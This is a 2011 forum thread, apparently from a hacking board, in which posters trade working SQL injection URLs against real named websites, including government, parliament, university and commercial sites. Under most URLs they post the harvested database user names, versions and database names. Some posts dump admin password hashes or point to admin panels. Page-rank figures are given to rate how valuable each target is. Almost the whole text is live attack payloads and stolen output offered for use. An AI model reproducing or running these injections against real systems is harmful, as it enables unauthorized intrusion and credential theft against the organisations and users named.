http://www.armagh.gov.uk/service_details.php?service_id=-5+union+select+1,2,concat%28user%28%29,0x3a,databa se%28%29,0x3a,version%28%29%29,4,5,6,7,8,9,10,11,1 2--
PR: 6
version: 4.0.18
user: armaghcorp@localhost
database: armaghcorp
Code:
http://www.image1inc.ca/category_detail.php?service_id=1&service_name=Window%20Tinting&cat_id=-1+union+select+1,2,3,4,concat%28user%28%29,0x3a,da tabase%28%29,0x3a,version%28%29%29,6--&cat_name=Automotive
PR: 2
version: 5.0.92
user: web_only@my1.rimages.net
database: image1
Code:
http://www.setisnasti.ru/services/note.php?id=-1'+union+select+1,concat_ws(0x3a,parol_login,parol _psw),3+from+parol_table+--+
тИЦ 10
Code:
http://www.lammertpostma.com/notebook/note.php?id=-25'+union+select+1,2,concat_ws(0x3a,ID,user_name,u ser_pass),4+from+accounts+--+
5.1.49-1~bpo50+1
PR 2
Code:
http://www.beskid.com/base/note.php?id=-1465'+union+select+1,version(),3,4,5,6,7,8,9,10,11 ,12,13,14,15+--+
5.0.84-log
PR 5
Code:
http://www.eredux.com/states/transportation.php?id=-1128+union+select+1,version(),3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,4 5,46,47,48,49,50,51,52+--+
5.0.92-community
PR 4
Code:
http://www.arvtripeaks.com/transportation.php?id=-28+union+select+1,concat_Ws(0x3a,username,password ),3,4,5,6,7+from+user+--+
5.0.33
PR 4
Code:
http://greetingcardhaven.com/api.php?id=-35+union+select+1,2,concat_ws(0x3a,username,passwo rd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37, 38+from+members+limit+6,1+--+
4.1.22-standard
PR 2
http://www.onlinepetition.ru/sign.php?pUrl=-1'+union+select+1,2,3,concat_ws(0x3a,user(),versio n(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20+--+
onlinepe@localhost:4.1.25-log:wwwonlinepetitio
http://www.auto-magnitola.ru/amp/model.php?mode=fffff'+and+1=1+union+select+1,2,con cat_ws(0x3a,user(),version(),database()),4,5,6,7,8 ,9,10,11+--+
musiccar@localhost:5.0.24a:wwwmusiccarru
spherics
08.08.2011, 16:47
Developers of a web front end for a WoW emulator. The engine itself seems fine, but the site is in trouble.
http://www.web-wow.net/top100.php?ax=out&id=522999999999999999999+union+select+1,concat_ws( 0x3a,version(),user(),database()),3--
webwowne_axe@localhost
5.0.91-community-cll
webwowne_main
http://www.web-wow.net/top100.php?ax=out&id=-522000000000000000000+union+select+1,concat_ws%280 x3a,login,password%29,3+from+accounts--
admin2 f48871733b9daca36611bd69a7ac8e3220713a60
admin 8301316d0d8448a34fa6d0c6bf1cbfa2b4a1a93a
http://www.clickthecity.com/movies/theaters.php?cid='+and+1=1+union+select+1,concat_w s(0x3a,user(),version(),database()),3,4+--+
clickthecity@10.36.10.163:5.1.58-log:CTC_DB
*uNkN0Wn*
09.08.2011, 04:08
PHP:
http://www.liquidhealthinc.com/prodInterior.php?prodID=-32'+union+select+1,concat(database(),char(59),vers ion(),char(59),user()),3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19+--+
VERSION : 5.1.53-log
DATABASE : liquidhealthdb
USER : liquidhealth@hachiman.dreamhost.com
PR - 3
PHP:
http://www.ematic.us/product_details.php?prodID=-83+union+select+1,concat(database(),char(59),versi on(),char(59),user()),3,4,5,6,7,8+--+
VERSION : 5.0.91-log
DATABASE : db248448044
USER : dbo248448044@74.208.16.202
PR - 4
PHP:
http://slyelectronics.com/productdetails.php?prodID=-184+union+select+1,concat(database(),char(59),vers ion(),char(59),user()),3,4,5+--+
VERSION : 5.0.91-log
DATABASE : slyelectronics
USER : slyelectronics@208.109.181.187
Code:
http://www.amvastgoed.nl/index.php?option=com_project&view=project&project_id=-21+UNION+SELECT%20%20+1,2,3,4,5,6,7,8,9,10,11,conc at_ws%280x3a,user%28%29,version%28%29,database%28% 29%29,13,14,15,16,17,18,19,20,21,22,23,24--
Username: multidev@localhost
Version: 5.0.81Nxs Internet Bv
Database: multidev
Google PR: 5
*uNkN0Wn*
09.08.2011, 13:29
PHP:
http://www.imobilemedic.com/productDescription.php?prodID=-2+union+select+concat(database(),char(59),version( ),char(59),user()),2,3,4,5,6,7,8,9+--+
VERSION : 5.0.91
DATABASE : imobile1_immweb
USER : imobile1_immweb@localhost
PR - 4
PHP:
http://www.mpressbooks.com/profile.php?prodid=-12-988'+union+select+1,2,concat(database(),char(59),v ersion(),char(59),user()),4,5,6,7,8+--+
VERSION : 5.0.51b-log
DATABASE : mpressbooks
USER : webadm@chumley.darkhorse.com
PR - 6
ТиЦ - 100
Radio.tut.by
tut.by is the largest Belarusian portal.
Code:
http://radio.tut.by/area.php?id=-17+union+select+1,2,version(),4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19+--+
4.0.27-Max-log
тИЦ 200
PR 5
*uNkN0Wn*
11.08.2011, 15:47
PHP:
http://www.e-arc.com/site/div_summary.php?mem_id=-144'+union+select+1,2,concat(database(),char(59),v ersion(),char(59),user()),4,5,6,7,8,9,10+--+
VERSION : 5.0.67-community
DATABASE : beta_smallfm
USER : beta_smallfm@amc1.e-arc.com
PR - 5
PHP:
http://www.psnwa.org/member/portal/view_profile.php?mem_id=-621+union+select+concat(database(),char(59),versio n(),char(59),user()),2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23+--+
VERSION : 5.1.58-community-log
DATABASE : psnwaorg_memberpsnwaorg
USER : psnwaorg_admin@localhost
PR - 3
Australian Parliament website:
PR 7 тИЦ - 120
Vulnerability in the MS SQL DB client
DB platform:
Microsoft SQL Server 2000 - 8.00.818 (Intel X86) May 31 2003 16:08:15 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
DB name:
ROCRWD
DB user name:
rocruser
DB tables:
CowPat_Index
CommitteeInformation
dtproperties
sysconstraints
syssegments
tblCommittee
...
http://www.aph.gov.au/house/committee/report_register/byKeylist.asp?id=1%27+or+1=%28SELECT+TOP+1+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAM E+NOT+IN+%28%27CowPat_Index%27,%27CommitteeInforma tion%27,%27dtproperties%27,%27sysconstraints%27,%2 7syssegments%27%,%27СЛЕДУЮЩАЯ ТАБЛИЦА%27%29%29--
Path to the vulnerable script
/house/committee/report_register/byKeylist.asp
Exploit
_http://www.aph.gov.au/house/committee/report_register/byKeylist.asp?id=1'+or+1=(
SQL INJ
))--
http://www.anhuigov.cn/showproj.php?id=-1404+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,concat_ws%280x3a,us er,host,file_priv%29,26,27,28,29,30,31,32,33,34,35 ,36,37,38,39,40,41,42,43,44,45+from+mysql.user--
root@localhost:5.1.34-community:ahcttest:root:localhost:Y
http://www.golem.es/distribucion/noticias.php?id_noticia=-230+union+select+1,2,unhex%28hex%28version%28%29%2 9%29,4,5,6--
4.1.11-Debian_4sarge8-log
Code:
http://www.kn.kz/smi.php?id=-1+union+select+concat_ws(0x3a,id,user,u_password)+ from+Users_access+--+
5.0.51a-24+lenny4-log
тИЦ 350
PR 3
http://we.e-rubtsovsk.ru/link.php?link=-217+and+1=2+union+select+1,2,@@version,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42, 43,44,45,46,47,48+--
5.1.49-1ubuntu8
Code:
http://www.2kaudit.com/smi.php?id=-1190+union+select+1,version(),3+--+
4.0.27-log
2kaudit-ru:2kaudit-ru@fhe15.hoster.ru
тИЦ 475
PR 4
http://www.apca.org.ug/index.php?ty=page&i=107+or%281,2%29=%28select+count%28*%29,concat%28 %28++select+concat%28user(),0x3a,version(),0x3a,da tabase(),0x3a,username,0x3a,password%29+from+users +limit+0,1%29,0x3a,floor%28rand%28%29*2%29%29+from +information_schema.columns+group+by+2+limit+0,1%2 9--
apcadbadmin1@localhost:5.1.44:apca_org_ug
http://www.bwinditrust.ug/content.php?content_id=8&sub_id=7 or(1,2)=(select count(*),concat(( select concat(user(),0x3a,version(),0x3a,database(),0x3a, uname,0x3a,passwd,0x3a,level,0x3a,status) from authuser limit 0,1),0x3a,floor(rand()*2)) from authuser group by 2 limit 0,1)
bwindidbadmin@localhost:5.1.44:bwinditrust_ug
http://www.naro.go.ug/Inventory/naro/display_search_results.php
POST
institution_type=-3+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,us er(),database(),version()),11--&Button2=+++SEARCH++++
narodbadmin@localhost:naro_go_ug:5.1.44
Bio[GOOGLE]rede.pt PR - 4
Exploit
http://www.bio[GOOGLE]rede.pt/page.asp?id=2 or 2=(SQLI)--
User name: webbiorede
Database: Biorede
Platform: Microsoft SQL Server 2008 (SP1) - 10.0.2775.0 (X64) Apr 30 2010 14:31:04 Copyright (c) 988-2008 Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 6.0 (Build 6002: Service Pack 2)
Other DBs on the server:
master
tempdb
model
msdb
jazzportugal
...
------------------------------------------------------------------------
Jazzportugal.ua.pt PR - 5
Exploit
http://www.jazzportugal.ua.pt/web/musicos.asp?l=1 or 1=(SQLI)
User name: webjazz
Database: jazzportugal
Everything else is the same, since these two DBs are hosted on the same server, but they have no access to each other.
Cennarios
14.08.2011, 18:06
Yet another cr**py hosting provider
http://www.webconexion.net/documentation/comment.php?article_id=007+or+1+group+by+concat%28 %28select%20host+from+mysql.user+WHERE+User=0x726F 6F74%29,floor%28rand%280%29*2%29%29%20having%20min %280%29--+&action=new
Music portal with traffic of ~90k unique visitors
Injection in MySQL 5.1.51
Code:
http://www.bis[туц-туц]ound.com/index.php?name=Topics&op=view&id=-70380+union+select+1,2,3,user_password,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20+from+slaed_users+w here+user_name=%22admin%22
Ranks first in Yandex for the query "куплю мебель" ("buy furniture")
http://www.bymebel.ru/salon.php?idf=aaa%27+union+select+NULL,NULL,versio n%28%29,database%28%29,user%28%29,NULL,NULL,NULL,N ULL,NULL,1,2,3,4,5,6,7,8,9,20,1+--+
udb2653
4.0.26-log
Uwww2653S@localhost
Blind SQL Inj ---PR 5
http://dsor.upb.de/index.php?id=65&empid=-1'+and+substring(@version(),1,1)=5--+
DB type: MySQL 5
DB name: typo3db
User name: dsor@dsor.upb.de
----------------------------------------------------------------------
SQL Inj---PR 5
http://www.startingoutguide.org.uk/employers/28?empid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,,17,18,19,20,21,22,23,24,25,26,27--+
DB type: MySQL 5.0.45
DB name: sog2010
User name: starting@startingoutguide.org.uk
----------------------------------------------------------------------
SQL Inj---PR 6
http://www.dbm.state.md.us/phonebook/IndDetails.asp?EmpID=1%20or%201=@@version
DB type: Microsoft SQL Server 2005
COOLBOY007
17.08.2011, 00:18
Code:
http://www.autoland.com.ua/article.php?id=-19+union+select+concat_ws(0x3a,user(),version(),da tabase()),2+--+
User: autoland_xxx@localhost
Version: 5.0.51a-community
Database: autoland_xxx
PR 4
тИЦ 30
Code:
http://www.addinol.de/oilfinder/oil_details.php?id=658 and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
User: berezovski@localhost
Version: 5.0.26
Database: oilfinder1
PR 4
тИЦ 30
Code:
http://www.cdr-forum.de/showdvdanbieter.php?ID=-105+union+select+1,concat_ws(0x3a,user(),version() ,database())+--+
User: p33794567@localhost
Version: 4.0.27-standard
Database: db67865067
PR 4
тИЦ 10
Ministry of Land and Property Relations...
Code:
http://mio.bashkortostan.ru/index.php?page=Information&id=1152+union+Select+1,user+from+mysql.user --
version: 4.0.24_Debian-10-log
database: mio
user: root@localhost
PR: 5 / тИЦ: 50
COOLBOY007
17.08.2011, 14:57
Code:
http://www.no2id.net/news/newsletters/newsletter.php?issue=118 and 1=1
User: no2id@localhost
Version: 4.0.24_Debian-10sarge3-log
Database: no2id
PR 6
тИЦ 20
Code:
http://www.balh.co.uk/eventsbooking_form.php?id=77 and 1=1
User: dbo137413126@212.227.109.52
Version: 4.0.27-max-log
Database: db137413126
PR 5
тИЦ 10
Code:
http://www.historytoherstory.org.uk/subject.php?id=287 and 1=1
User: highplace@localhost
Version: 3.23.56
Database: highplacedb
PR 5
тИЦ 10
Code:
http://www.simshare.org.uk/project.php?id=85%20and%201=1
User: ukcle_dbadmin@localhost
Version: 5.1.52
Database: ukcle_oer
PR 4
Cennarios
18.08.2011, 01:58
It worked out
http://www.discovery.org/scripts/viewDB/index.php?command=view&printerFriendly=true&id=-1783+union+select+user%28%29,2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16--+
Mickey House
18.08.2011, 06:49
http://www.golfdm.co.uk/site/pages.php?fid=0,13&pp_id=38%20union%20select%201,2%20,3,group_concat% 28acc_id,0x3a,acc_email,0x3a,pword%20%29,5%20from% 20tblaccount--
COOLBOY007
18.08.2011, 13:26
Code:
http://www.regula.ws/index.php?id=57&ml=ru and 1=1
User: regula@localhost
Version: 4.1.18-standard
Database: db_regula
PR 5
тИЦ 30
Code:
http://www.kolesa-spb.ru/tiresitems.php?id=308' and 1=1 and 'x'='x
User: z96996_1@77.221.130.22
Version: 5.1.49-3-log
Database: z96996_1
PR 2
тИЦ 30
Code:
http://g10sms.com/see.php?id=4716 and 1=1
User: gsmscom_jamsheer@127.0.0.1
Version: 5.0.92-community
Database: gsmscom_newsms
PR 4
bloodAngel
18.08.2011, 22:54
Code:
http://si.ras.ru/index.php?pid=%271%27and%28exists%28select%281%29f rom%28users%29w%20here%28ascii%28lower%28substring %28user_id,1,1%29%29%29%29like%2850%29%20%29%29and %271%27%3C%272%27
blind
тИЦ 60 PR 5
Tyumen State University: scientific and methodological journal
Code:
http://perspectives.utmn.ru/?n=4&y=-2004+union+select+1,2,3,4,5,6,7,group_concat%28tab le_name+separator+0x3a%29+from+information_schema. tables+where+table_schema=0x64625f313539+--+
version: 5.5.12
database: db_159
user: dbu_159@localhost
+ PR: 4/10 | тИЦ: 20
Tyumen State University: Tests (.blind)
Code:
http://tests.utmn.ru/tests.php?gr=72+and+substring(@@version,1,1)=5
P.S. Who will be the first to reach the supercomputer?
Municipal procurement server of the city of Tyumen
Code:
http://mz.tyumen-city.ru/cgi-bin/konkurs.pl?action=invite&id=-1110024+union+select+1,concat_ws%280x3a,version%28 %29,database%28%29,user%28%29%29,3+--+
version: 4.1.22
database: zakaz1
user: root@localhost
+ PR: 4/10 | тИЦ: 20
MyGreenLife
19.08.2011, 19:52
http://thebreederratings.com/details.php?bid=-10+union+select+1,2,3,4,group_concat(column_name), 6,7,8,9,10,11,12,13,14,15,16,null+from+information _schema.columns+where+table_name=0x616363657373--+
Sss .
COOLBOY007
20.08.2011, 14:00
Code:
http://www.zelfbouw-groenestroom.nl/redir.php?id=165 and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
User: U536277@jenkins.stor
Version: 5.0.91-log
Database: DB5362771
PR 3
Code:
http://www.dogsite.ws/web/r.php?ID=393.9 union all select 1,2,3,4,concat_ws(0x3a,user(),version(),database() ),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3+--+
User: leo@174.132.181.42
Version: 5.0.67
Database: ds
PR 2
тИЦ 70
Code:
http://www.fursuit.co.uk/category.php?id=2 /*!30000and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/
User: fursuit_fursuit@localhost
Version: 5.0.92-community
Database: fursuit_links1
PR 3
Code:
http://www.fellrunner.org.uk/races.php?id=' and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1
User: fra@localhost
Version: 5.1.54-1ubuntu4
Database: fra1
PR 4
Code:
http://www.designdeck.co.uk/article_details.php?id=246 and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
User: design_user@localhost
Version: 5.0.92-community
Database: design_db1
PR 3
MyGreenLife
20.08.2011, 15:44
1)
http://www.monarchshockey.com/bio.php?bid=-180+union+select+1,2,3,4,5,6,7,group_concat(column _name),9,10,11,12,13,14,15,16+from+information_sch ema.columns+where+table_name=0x67697665617761795f7 573657273+--+
PR 5
2)
http://thebreederratings.com/details.php?bid=-10+union+select+1,2,3,4,concat(email,0x3a,password ),6,7,8,9,10,11,12,13,14,15,16,null+from+access#
COOLBOY007
20.08.2011, 17:30
Code:
http://www.biochar.org.uk/abstract.php?id=37.9+union+all+select+1,2,3,4,conc at_ws(0x3a,user(),version(),database()),6,7,8,9,10 +--+
User: biocharuser@tenbears.xcalibre.co.uk
Version: 5.0.77
Database: biochar
PR 5
Code:
http://core.materials.ac.uk/search/detail.php?id=2762 and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
User: core_read@pc010019.mat.liv.ac.uk
Version: 5.1.45-community
Database: core1
PR 5
Code:
http://www.huhmagazine.co.uk/view_article.php?id=2215.9+union+all+select+1,conc at_ws(0x3a,user(),version(),database()),3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+--+
User: Jack@localhost
Version: 5.0.86
Database: jacklowe_huh
PR 5
http://101vanna.ru/detail.php?id=110&pid=-543+and+1=2+union+select+1,@@version,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29+--
5.0.90
COOLBOY007
21.08.2011, 14:32
Code:
http://www.underwatertimes.com/news.php?article_id=999999.9 union all select 1,2,concat_ws(0x3a,user(),version(),database()),4, 5,6,7+--+
User: underw6_full@localhost
Version: 5.0.92-community
Database: underw6_762521
PR 5
TIC 20
Code:
http://www.jpr.org.uk/publications/publication.php?id=138&sid=155 and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
User: jpr@localhost
Version: 5.1.50
Database: jpr31
PR 6
TIC 20
Code:
http://www.healthgrid.org/news/index.php?id=32.9+union+all+select+1,concat_ws(0x3 a,user(),version(),database()),3+--+
User: healthgrid@localhost
Version: 5.0.51a-24+lenny5
Database: healthgrid_website
PR 6
TIC 10
MyGreenLife
21.08.2011, 23:18
Strange, but spaces and pluses stubbornly refused to work for me ... I solved the problem with tuns, which can be replaced with pluses...
http://konditerprom.ru/list/list.php?cid=1)/**/%26%26/*tuns*/(1)like(2)/*tuns*//*!union+select*//*tuns*/1,2,concat(0x3a,version(),0x3a,user(),0x3a,databas e(),0x3a,@@datadir,0x3a,@@basedir,0x3a,@@tmpdir,0x 3a,@@version_compile_os),4,5,6,7,8,9,10--%0d
http://konditerprom.ru/list/list.php?cid=-1)/*tuns*/union/*tuns*/select/*tuns*/1,group_concat(column_name),3,4,5,6,7,8,9,10/*tuns*/from/*tuns*/information_schema.columns/*tuns*/where/*tuns*/table_name=0x7573657273--%0d
TIC 80, PR 4, Yandex Catalog, DMOZ
Output appears between =>
HTML:
http://www.hotels-in.ru/hotel.php?hid=999999.9+union+all+select+concat(0x3 d3e,unhex(Hex(cast(database()+as+char))),0x3c3d)--
TIC 10, PR 2
HTML:
http://aquatics.ru/accessory.php?aid=999999.9+union+all+select+1,conc at(0x3a29203d3e,unhex(Hex(cast(database()+as+char) )),0x3c3d20283a),NULL,NULL,NULL,NULL,NULL,NULL--
EASYHOMEPOKER
Maybe you'll find something
HTML:
http://easyhomepoker.com/player.php?id=999999.9+union+all+select+1,2,concat (0x3d3e,database(),0x3c3d),NULL,NULL,NULL,NULL--
*uNkN0Wn*
22.08.2011, 15:06
Code:
http://shrs.iupui.edu/about/profile.php?emp_id=-22+union+select+1,concat(database(),char(59),versi on(),char(59),
user())+--+
VERSION : 5.0.83
DATABASE : shrsweb
USER : root@lux2.uits.indiana.edu
PR - 5
Target: http://www.championsseriestennis.com/player.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,c oncat_ws(0x3a,id,username,password
Host IP: 184.168.136.128
Web Server: Apache
DB Server: MySQL
Resp. Time(avg): 867 ms
Current User: gcaparulo2@184.168.193.186
Sql Version: 5.0.91-log
Current DB: gcaparulo2
System User: gcaparulo2@184.168.193.186
Host Name: p3nlhdb5007-07.shr.prod.phx3.secureserver.net
Installation dir: /usr/local/mysql-5.0.91-linux-x86_64-icc-glibc23/
DB User: 'gcaparulo2'@'%'
Data Bases: information_schema
gcaparulo2
PR-5
*uNkN0Wn*
22.08.2011, 20:38
PHP:
http://www.al-mawrid.org/pages/research_detail.php?research_id=-5+union+select+1,concat(database(),char(59),versio n(),char(59),user()),3,4+--+
VERSION : 5.1.55
DATABASE : almaw0_mawrid
USER : almaw0_naveed@localhost
PR - 5
PHP:
http://www.fpl.fs.fed.us/research/highlights/view_research_highlight.php?research_id=-1+union+select+1,2,3,4,5,6,7,8,concat(database(),c har(59),version(),char(59),user()),10,11,12,13,14, 15+--+
VERSION : 5.0.51a-3ubuntu5.5
DATABASE : forestproductslaboratorydb
USER : root@localhost
PR - 6
COOLBOY007
22.08.2011, 20:45
Code:
http://kinogallery.com/news/comments.php?id=9641 and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
User: kinogaller_kino@localhost
Version: 5.0.51a-community
Database: kinogaller_kino1
PR 4
TIC 140
COOLBOY007
23.08.2011, 23:38
Code:
http://club-edu.tambov.ru/main/methodic/index.php?id=40' and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1
User: club@localhost
Version: 5.1.30-log
Database: club_methodic1
PR 5
TIC 2900
Code:
http://www.desertmuseum.org/center/edu/pp_showclass.php?id=1580 and 1=1
User: webasdm@69.9.3.67
Version: 4.0.18-log
Database: asdmdata
PR 6
TIC 20
Code:
http://www.manli.com/products/details.php?id=113.9 union all select 1,2,concat_ws(0x3a,user(),version(),database()),4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26+--+
User: manlico_web@localhost
Version: 5.0.92-community
Database: manlico_web
PR 4
TIC 130
Cennarios
24.08.2011, 20:13
Campaign: An Internet without cr*p
http://www.webhostingcanada.com/faq/question.php?mode=read&question=-14+union+select+1,2,3,4,5,user(),7,8,9,10,11,12,13 ,14,15--+
nemaniak
25.08.2011, 18:22
labocadellobo.es PR-5
Code:
http://www.labocadellobo.es/laboca/ficha.php?menu_id=1&jera_id=14&page_id=-75+/*!UnIoN*/+/*!SEleCT*/+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,concat_ws(0x3a ,version(),user(),database()),17+--+
Code:
5.0.77:Boca2007@localhost:Boca2007
www.fam.ulusiada.pt PR-6 blind
Code:
http://www.fam.ulusiada.pt/noticias/artigo.php?news_id=1217'+and+5=substring((select+v ersion()),1,1)+--+
(no redirect)
theatreinchicago.com PR-5
Code:
http://www.theatreinchicago.com/newswire.php?newsID=-215+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,4,5,6,7,8,9,10,11+--+
Code:
4.0.27-standard:dbo141597383@localhost:db141597383
MyGreenLife
25.08.2011, 23:26
http://autodaynews.ru/cat.php?cid=1+or(1,1)=(select+count(*),concat_ws(0 x3a,(select+concat(user,0x3a,pass)+from+userlist+l imit+0,1),floor(rand()*2))+from+information_schema .tables+group+by+2+limit+1,1)--+
Admin panel - http://autodaynews.ru/admin/
COOLBOY007
26.08.2011, 14:00
Code:
http://www.tlmshk.edu.hk/news_detail.php?id=204.9'+union+all+select+1,2,3,4 ,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3a,user() ,version(),database()),17,18,19,20,21,22,23,24,25, 26,27,28+and+'x'='x
User: root@localhost
Version: 4.1.22
Database: schweb
PR 4
Code:
http://www.tup.edu.ph/article.php?id=bulletin&bID=9.9+union+all+select+1,concat_ws(0x3a,user(),v ersion(),database()),3,4,5,6+--+
User: root@localhost
Version: 5.0.27-community-nt
Database: tupcms
PR 5
TIC 10
Code:
http://languages.uconn.edu/faculty/details.php?id=23.9+union+all+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,concat_ws(0x3a,user(),versi on(),database()),17,18,19+--+
User: languages@web.uconn.edu
Version: 5.0.26-log
Database: languages
PR 7
TIC 400
http://www.abades.es/novedades.php?id_noticia=-250+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8--
5.0.77:abades:abades@localhost
http://pin.primate.wisc.edu/scripts/external.php?link=-2763+union+select+concat_ws(0x3a,version(),databas e(),user()),2,3,4--
5.0.67-login:libadm@saimiri.
Cennarios
27.08.2011, 12:47
www.stanford.com
http://www.stanford.com/dept/asianlang/cgi-bin/about/getevent.php?id=-1983+union+select+1,2,3,4,5,6,7,user%28%29--+
Code:
http://www.infovis.net/printMag.php?lang=2&num=-158+union+select+1,2,3,4,version(),6,7,8,9,10,11,1 2,13+--+
5.0.67-Max
TIC 10
PR 5
Code:
http://www.petrofinder.com/member_list/member_read.php?num=-5324+union+select+1,2,3,4,5,6,7,version(),9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23
4.0.27-Max
TIC 10
PR 5
Code:
http://velosamara.ru/navigator/GoogleMapTreks.php?category_id=-4+union+select+1,version(),3,4,5,6,7--
5.0.77
TIC 275
PR 3
Code:
http://www.downingandlahey.com/online_services/obituary.php?id=-3923+union+select+1,version(),3,4--
5.0.91-log
PR 3
Code:
http://www.onlinenews.com.pk/details.php?id=99999999+union+select+1,2,3,version (),5,6,7,8,9,10,11,12,13,14,15,16,17,18--
5.0.45-community-nt
TIC 30
PR 5
http://www.baiwanweb.com
http://www.baiwanweb.com/news_view.php?ID=9604+union+select+1,2,3,4,5,6,7+--+
COOLBOY007
27.08.2011, 19:19
Code:
http://www.dole.gov.ph/list_of_holidays.php?id=95 and 1=1
User: dolews_sjksd721@localhost
Version: 5.0.51a-log
Database: dolews_4a351sd
PR 6
TIC 10
Code:
http://www.dftqc.gov.np/content.php?id=61.9+union+all+select+1,2,concat_ws (0x3a,user(),version(),database()),4,5,6+--+
User: dftqcgo_mraf@localhost
Version: 5.0.92-50-log
Database: dftqcgo_daft
PR 4
Website of the State Architectural and Construction Inspectorate of Ukraine
Code:
http://dabi.gov.ua/news_text.php?id=563+union+all+select+1,2,concat_w s(0x3a,user(),version(),database()),4,5,6+--+
User: u_dabi@localhost
Version: 5.0.51a-24+lenny5
Database: dabi
PR 4
TIC 80
COOLBOY007
28.08.2011, 12:31
The Alaska State Legislature
Code:
http://house.legis.state.ak.us/rep.php?id=123'+union+all+select+1,2,3,4,5,6,7,8,c oncat_ws(0x3a,user(),version(),database()),10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25+--+
User: intranet@wwwjnu02.legis.state.ak.us
Version: 5.0.77-log
Database: intranet
PR 5
Code:
http://artcatalog.su/stat.php?id=207' and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1
User: artcat@localhost
Version: 5.1.50-log
Database: artcatalog1
PR 3
TIC 80
Committee of Voters of Ukraine, Donetsk regional public organization
Code:
http://www.cvu.dn.ua/download.php?id=63.9'+union+all+select+1,2,3,4,5,6 ,7,8,9,concat_ws(0x3a,user(),version(),database()) ,11,12,13,14,15,16+and+'x'='x
User: h3403_cvu@localhost
Version: 5.1.50
Database: h3403_cvu
PR 3
TIC 30
Code:
http://filtr.kharkov.ua/t.php?id=5.9+union+all+select+1,2,3,4,5,6,7,8,9,co ncat_ws(0x3a,user(),version(),database()),11,12,13 ,14,15,16,17+--+
User: uzver@localhost
Version: 5.1.49-3-log
Database: filtr
PR 6
TIC 9500
Code:
http://www.autodealer.ua/articles/event.php?id=999999.9' union all select 1,concat(0x7e,0x27,concat_ws(0x3a,user(),version() ,database()),0x27,0x7e),3,4+--+
User: ua_adlr@localhost
Version: 5.1.41-3ubuntu12.9
Database: ua.autodealer
PR 4
TIC 190
DezMond™
28.08.2011, 15:23
www.abw.by TIC425 PR5 AR16700
Visitors in 24 hours: 59537
Code:
http://www.abw.by/index.php?act=catalog2&do=tbl&ph=372&n_ph=4&n1_ph=2&pht=4&mark2=Citroen&model23=Xsara&marka_id22=51&model_id23=691&id=-7496+union+select+null,2,3,4,concat_ws(0x3a,userna me,user_password)+from+users+--+
P.S. Total registered users: 544143
Code:
http://www.worldcall.net.pk/news.php?id=1+union+Select+1,group_concat%28table_ name%29,3,4,5+from+information_schema.tables+where +table_schema=0x6e65775f706f7274616c5f32303038%20--
version: 5.0.77
database: new_portal_2008
user: root@localhost
+ PR: 4
Code:
